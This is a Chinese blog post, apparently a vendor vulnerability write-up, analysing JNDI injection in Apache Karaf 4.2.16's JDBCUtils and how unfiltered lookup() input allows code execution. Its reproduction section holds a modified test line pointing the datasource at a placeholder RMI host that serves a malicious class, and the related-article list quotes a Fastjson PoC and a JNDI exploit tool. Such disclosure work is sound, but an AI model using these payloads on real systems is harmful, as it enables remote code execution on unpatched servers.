漏洞深度分析|Apache Karaf 4.2.16 存在JNDI 注入漏洞

最新推荐文章于 2024-05-11 14:09:06 发布
最新推荐文章于 2024-05-11 14:09:06 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞深度分析 文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJQClqjc/article/details/128422802
版权

项目地址

GitHub - apache/karaf: Mirror of Apache Karaf

项目介绍

Apache Karaf是一个模块化运行时,支持多种框架和编程模型(REST/API、web、spring boot 等)。它提供了统包功能,您可以毫不费力地直接利用这些功能,打包为可变或不可变的应用程序。

项目版本

4.2.16

漏洞分析

该项目重写 JDBCUtils 作为连接数据库功能;在 jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils 使用了 jndi 协议测试链接是否正常访问,但是在 doCreateDatasource 函数中调用了 ic.lookup(jndiName) 来初始化查找数据库

 

lookup存在两个重载

看一下 lookup 的调用方法,传进 InitialContext#getURLOrDefaultInitCtx

lookup 拿到 name ,getURLScheme匹配 :和 /;之后获取链接内容,getURLContext 解释包含样例

For example, if the scheme id is "ldap", and the Context. URL_PKG_PREFIXES property contains "com.widget:com.wiz. jndi", the naming manager would attempt to load the following classes until one is successfully instantiated:
· com.widget.ldap.ldapURLContextFactory
· com.wiz.jndi.ldap.ldapURLContextFactory
· com.sun.jndi.url.ldap.ldapURLContextFactory

而我们可以控制 lookup 函数的参数,使客户端访问提前设置好的恶意的 RMI 服务链接来加载恶意的对象class 字节码文件来实例化,从而执行代码,完成利用。

该类并不存在任何黑/白名单对用户传入进行过滤,用户可直接传入rmi 恶意链接执行命令。确定该处存在 jndi注入,可被利用导致命令执行

漏洞复现

该项目无web界面,利用方式可使用官方提供的Test类进行测试。 测试类为 JdbcLoginModuleTest

该项目测试类并没有测试 jndi 协议,而是测试 osgi 协议。为了复现我们需要更改为 jndi 协议。代码如下所示

        options = new HashMap<>();
//        options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());
        options.put(JDBCUtils.DATASOURCE, "jndi:rmi://x.x.x.x:23456/Command8");
        options.put(BundleContext.class.getName(), context);

因为是jndi注入,需要配置注入payload及工具,以 JNDI-1.0-all.jar 为例,无需配置相关选项,仅使用默认 config.properties 即可弹出计算器

修复方式

升级到最新版本

棱镜七彩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2 JNDI注入漏洞问题处理
逗神的博客
12-13 3181
log4j2 JNDI注入漏洞问题处理
CVE-2018-11788:Apache Karaf XXE漏洞(CVE-2018-11788)
03-18
在最近对Apache Karaf的研究中,我发现其XML解析器中存在一些XXE(XML外部实体注入漏洞。 导致解析器不正确地解析XML文档。受影响的版本Apache Karaf <= 4.2.1 Apache Karaf <= 4.1.6分析根据,Apache ...
JNDI注入漏洞
qq_61553520的博客
05-23 1214
基于Reference的远程/本地加载Factory类,攻击端需要启动LDAP/RMI目录服务,当攻击机请求之后,就会加载远程/本地的Factory来实现远程代码执行。反序列化的利用则是直接注入恶意的序列化数据,来达到远程代码执行的目的。
Java最新Log4j2的JNDI注入漏洞原理分析与思考,2024最新华为Java校招面试题
最新发布
2401_84024497的博客
05-11 658
我们总是喜欢瞻仰大厂的大神们,但实际上大神也不过凡人,与菜鸟程序员相比,也就多花了几分心思,如果你再不努力,差距也只会越来越大。实际上,作为程序员,丰富自己的知识储备,提升自己的知识深度和广度是很有必要的。
CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞
Fiverya的博客
02-10 3714
CVE-2023-25194漏洞
JNDI注入漏洞的原理和复现
Locosomnus的博客
01-29 1537
一篇关于JNDI注入的学习笔记
JNDI RMI 注入(Log4j2漏洞
sun0322
12-24 8236
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
apache karaf 中文文档
07-11
apache karaf 中文文档,非常适合入门的手册,思路清晰,
karaf-decanter:Apache Karaf Decanter的镜子
05-03
阿帕奇·卡拉夫·Decanter Apache Karaf Decanter是Apache Karaf的完整监视平台。 它非常可扩展,灵活,易于安装和使用。概述收集器:收集器负责收集监视数据。 可以使用两种收集器:*调度程序定期调用轮询收集器*...
[Apache Karaf] Apache Karaf 学习教程 (英文版)
03-16
[Packt Publishing] Apache Karaf 学习教程 (英文版) [Packt Publishing] Learning Apache Karaf (E-Book) ☆ 图书概要:☆ Develop and deploy applications using the OSGi-based runtime container, Apache ...
Learning Apache Karaf 配套源码
02-07
Apache Karaf 是一个轻量级、可嵌入式的Java企业服务 Bus(ESB)和运行时,基于OSGi规范。它被广泛用于构建模块化的Java应用程序和服务,特别适合微服务和云计算环境。这本书《Learning Apache Karaf》显然是为了...
jndi-1.2.1.jar.zip
03-20
ndi1..2.1所需要的jar,1,。2.1
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
karaf使用配置文档
03-21
karaf运行环境 karaf内置命令 karaf骨架使用 bundle、feature开发及部署流程 maven私服搭建
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5156
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
安全技术系列之JNDI注入
好记性不如烂笔头
09-28 5477
JDNI注入总结
漏洞复现 -“核弹”漏洞-Log4j2 JNDI注入(CVE-2021-44228)
菜鸟的测试世界
05-07 953
漏洞被评为“核弹”级别,实在是log4j使用范围太广了,只要写java的,没几个没听过用过log4j吧。 漏洞原理 利用jndi的Lookup功能,实现jndi注入命令执行 影响范围 log4j 2.0-beta9到2.15.0(1.* 版本不受影响) 复现环境 jdk: 1.8.0_181 log4j:2.14.1 OS:Win10 复现步骤 1. 创建一个springboot的工程,验证当前的log4j库是否存在漏洞。 能解析${}表达式的才存在漏洞,官网的log...
漏洞预警|Apache Kafka Connect JNDI注入漏洞
LJQClqjc的博客
02-16 623
棱镜七彩漏洞预警
OSGi 基本原理
weixin_33922670的博客
06-02 267
定义 OSGi(Open Service Gateway Initiative)技术是面向Java的动态模型系统。 这个框架实现了一个优雅、完整和动态地组价模型。应用程序(称为bundle)无序重新引导可以被远程安装、启动、升级和卸载。 OSGi服务平台提供在多种网络设备上无需重启的动态改变构造的功能。 为了最小化耦合度和促使这些耦合度可管理,OSGi技术提供一种面向服务的架构,...
ubuntu 22.04 安装karaf
10-25
根据提供的引用内容,以下是在Ubuntu 22.04上安装Karaf的步骤: 1. 首先,需要安装JDK11并下载Karaf。可以使用以下命令安装JDK11: sudo apt install openjdk-11-jdk-headless 然后,使用以下命令下载Karaf: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值